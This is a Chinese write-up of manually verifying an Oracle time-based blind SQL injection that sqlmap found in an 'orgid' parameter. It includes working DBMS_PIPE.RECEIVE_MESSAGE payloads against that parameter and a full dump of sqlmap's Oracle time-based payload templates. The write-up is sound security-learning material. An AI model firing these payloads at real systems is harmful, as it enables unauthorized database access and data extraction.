一次sqlmap扫出的Oracle数据库时间盲注的手工复现验证

sqlmap扫出的Oracle时间盲注截图

payload是

abz345Name=************&orgid=400') AND 3587=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(76)||CHR(74)||CHR(86),5) AND ('PrOw'='PrOw&abb017q=20220122&cxfw=1&abb017z=&bae204=0&pxfs=1&source=3&access_token=null&limit=12&_queryid=new

提示注入点是orgid参数，采用POST方式

由于第一次接触oracle的时间盲注，对orgid=400后面的payload不太懂，遂百度查到oracle的时间盲注主要有几种函数

DBMS_PIPE.RECEIVE_MESSAGE是其中一种（RECEIVE_MESSAGE 函数 - 从指定管道获取消息 - IBM 文档 ）

手工测试时，只要页面出现指定延时，就可以判定为时间注入

后来经过反复测试，把payload缩减到了不影响判断的最少值以便于调试且发现可以使用GET方式提交，如下：

orgid=1') and 11=dbms_pipe.receive_message('RDS',5) and ('1'='1&cxfw=1&source=3&limit=12

测试截图：

也请教另一位大佬得知，时间盲注也属于布尔型，就是通过真假来判断，只要出现指定时间的延时就可以判定为有注入，如果要把当前用户名或当前数据库名扒出来，只能一个个字符去尝试，每个128种尝试，sqlmap就是采用批量爆破方式，由此可以通过burpsuite去做。

SQLMap里关于Oracle数据库的时间盲注payload提取出来了（sqlmap目录\data\xml\payloads下）

<?xml version="1.0" encoding="UTF-8"?>

<root>
    <!-- Time-based boolean tests -->

    <!-- Prefering "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->
    <test>
        <title>Oracle AND time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
    <test>
        <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,3,9</clause>
        <where>3</where>
        <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
        <request>
            <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,3,9</clause>
        <where>3</where>
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
        <request>
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - Parameter replace (heavy queries)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>2</risk>
        <clause>1,3,9</clause>
        <where>3</where>
        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
        <request>
            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>


    <test>
        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
        <request>
            <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>2</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>
    <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
</root>

参考：

DBMS_PIPE 

Oracle基于延时的盲注总结 - 卿先生 - 博客园 

oracle 时间注入 - CSDN 

Oracle手工盲注小结 - 百度文库 

时间型盲注_heibaikong6的博客-CSDN博客_时间盲注 

hacking-oracle 

从sqlmap源码看如何自定义payload - 安全客，安全资讯平台 

工具| sqlmap payload修改之路（下） - FreeBuf网络安全行业门户 

某次报错注入到自定义sqlmap的payload全过程 

北大方正翔宇CMS系统通用型SQL注入漏洞 | CN-SEC 中文网